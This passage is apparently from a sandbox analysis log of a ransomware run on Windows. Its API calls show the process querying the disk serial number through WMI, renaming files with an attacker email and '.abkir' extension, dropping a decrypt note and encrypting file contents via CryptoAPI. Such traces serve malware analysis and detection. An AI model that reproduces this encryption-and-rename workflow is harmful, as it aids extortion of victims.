[5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0211.945] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x2 [0211.945] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x1 [0211.945] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0211.945] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0211.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6029ff0) returned 0x0 [0211.945] WbemDefPath:IUnknown:AddRef (This=0x6029ff0) returned 0x3 [0211.945] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x2 [0211.945] WbemDefPath:IWbemPath:SetText (This=0x6029ff0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0211.945] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ff0, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0211.945] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0211.945] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.945] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0211.946] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0211.946] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0211.946] IUnknown:Release (This=0xb51e34) returned 0x1 [0211.947] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6024b48) returned 0x0 [0211.947] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b48, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0211.947] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024b48, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x60271a0) returned 0x0 [0211.947] WbemLocator:IUnknown:Release (This=0x6024b48) returned 0x0 [0211.947] WbemLocator:IUnknown:QueryInterface (in: This=0x60271a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x60271a0) returned 0x0 [0211.947] WbemLocator:IUnknown:QueryInterface (in: This=0x60271a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0211.947] WbemLocator:IUnknown:AddRef (This=0x60271a0) returned 0x3 [0211.947] WbemLocator:IUnknown:QueryInterface (in: This=0x60271a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0211.947] WbemLocator:IUnknown:QueryInterface (in: This=0x60271a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0211.947] WbemLocator:IUnknown:QueryInterface (in: This=0x60271a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0211.948] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0211.948] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0211.948] WbemLocator:IUnknown:QueryInterface (in: This=0x60271a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0211.948] WbemLocator:IUnknown:Release (This=0x60271a0) returned 0x2 [0211.948] WbemLocator:IUnknown:Release (This=0x60271a0) returned 0x1 [0211.948] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0211.948] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0211.948] WbemLocator:IUnknown:QueryInterface (in: This=0x60271a0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x60271a0) returned 0x0 [0211.948] WbemLocator:IUnknown:AddRef (This=0x60271a0) returned 0x3 [0211.948] WbemLocator:IUnknown:Release (This=0x60271a0) returned 0x2 [0211.948] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ff0, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0211.948] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0211.948] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.948] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6027190) returned 0x0 [0211.948] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027190, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x60334d4) returned 0x0 [0212.385] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5bc74) returned 0x0 [0212.385] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bc74, pProxy=0x60334d4, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0212.385] WbemLocator:IUnknown:Release (This=0xb5bc74) returned 0x1 [0212.385] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5bc94) returned 0x0 [0212.386] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5bc74) returned 0x0 [0212.386] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bc74, pProxy=0x60334d4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0212.386] WbemLocator:IUnknown:Release (This=0xb5bc74) returned 0x2 [0212.386] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x1 [0212.386] CoTaskMemFree (pv=0xbd4948) [0212.386] WbemLocator:IUnknown:Release (This=0x6027190) returned 0x0 [0212.386] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5bc94) returned 0x0 [0212.386] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0212.387] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0212.387] WbemLocator:IUnknown:AddRef (This=0xb5bc94) returned 0x3 [0212.387] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0212.388] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0212.388] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5bbf4) returned 0x0 [0212.388] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bbf4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.388] WbemLocator:IUnknown:Release (This=0xb5bbf4) returned 0x3 [0212.388] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0212.388] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0212.388] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5bc7c) returned 0x0 [0212.389] WbemLocator:IRpcOptions:Query (in: This=0xb5bc7c, pPrx=0xb5bc94, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0212.389] WbemLocator:IUnknown:Release (This=0xb5bc7c) returned 0x3 [0212.389] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x2 [0212.389] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0212.389] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0212.389] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x60334d4) returned 0x0 [0212.389] WbemLocator:IUnknown:AddRef (This=0x60334d4) returned 0x4 [0212.389] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x3 [0212.389] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x2 [0212.389] SysStringLen (param_1=0x0) returned 0x0 [0212.389] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ce0, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0212.389] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0212.389] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0212.389] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0212.389] WbemLocator:IUnknown:AddRef (This=0xb5bc94) returned 0x3 [0212.389] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5bc94) returned 0x0 [0212.389] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x3 [0212.389] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x2 [0212.390] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0212.390] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0212.390] IWbemServices:GetObject (in: This=0x60334d4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x60287e0, ppCallResult=0x0) returned 0x0 [0212.525] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ff0, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0212.525] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0212.525] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.525] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36518f4*=0, plFlavor=0x36518f8*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36518f4*=8, plFlavor=0x36518f8*=0) returned 0x0 [0212.525] SysStringByteLen (bstr="9C354B42") returned 0x10 [0212.525] SysStringByteLen (bstr="9C354B42") returned 0x10 [0212.525] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36518f4*=8, plFlavor=0x36518f8*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36518f4*=8, plFlavor=0x36518f8*=0) returned 0x0 [0212.525] SysStringByteLen (bstr="9C354B42") returned 0x10 [0212.525] SysStringByteLen (bstr="9C354B42") returned 0x10 [0212.525] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", lpFilePart=0x0) returned 0x33 [0212.525] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x56 [0212.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0212.526] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x37ebddc0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0212.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0212.526] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0212.527] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm", lpFilePart=0x0) returned 0x34 [0212.527] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0212.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0212.527] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0212.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0212.527] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm", lpFilePart=0x0) returned 0x34 [0212.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0212.527] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm"), fInfoLevelId=0x0, lpFileInformation=0x3651e18 | out: lpFileInformation=0x3651e18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4214)) returned 1 [0212.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0212.527] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm", lpFilePart=0x0) returned 0x34 [0212.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0212.527] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0212.528] GetFileType (hFile=0x31c) returned 0x1 [0212.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0212.528] GetFileType (hFile=0x31c) returned 0x1 [0212.528] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4214 [0212.528] ReadFile (in: hFile=0x31c, lpBuffer=0x3651fe0, nNumberOfBytesToRead=0x4214, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x3651fe0*, lpNumberOfBytesRead=0x8f6eedc*=0x4214, lpOverlapped=0x0) returned 1 [0212.663] CloseHandle (hObject=0x31c) returned 1 [0212.664] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbdfbf0) returned 1 [0212.665] CryptGenRandom (in: hProv=0xbdfbf0, dwLen=0x10, pbBuffer=0x36568b8 | out: pbBuffer=0x36568b8) returned 1 [0212.891] CryptImportKey (in: hProv=0xbdfbf0, pbData=0x387543c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f890) returned 1 [0212.891] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.891] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.891] CryptDuplicateKey (in: hKey=0xb7f890, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f290) returned 1 [0212.891] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.891] CryptSetKeyParam (hKey=0xb7f290, dwParam=0x4, pbData=0x387551c*=0x1, dwFlags=0x0) returned 1 [0212.892] CryptSetKeyParam (hKey=0xb7f290, dwParam=0x1, pbData=0x38754e8, dwFlags=0x0) returned 1 [0212.892] CryptEncrypt (in: hKey=0xb7f290, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x387552c*, pdwDataLen=0x8f6eea8*=0x4220, dwBufLen=0x4220 | out: pbData=0x387552c*, pdwDataLen=0x8f6eea8*=0x4220) returned 1 [0212.892] CryptEncrypt (in: hKey=0xb7f290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3879770*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x3879770*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0212.893] CryptDestroyKey (hKey=0xb7f890) returned 1 [0212.893] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0212.893] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0212.893] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 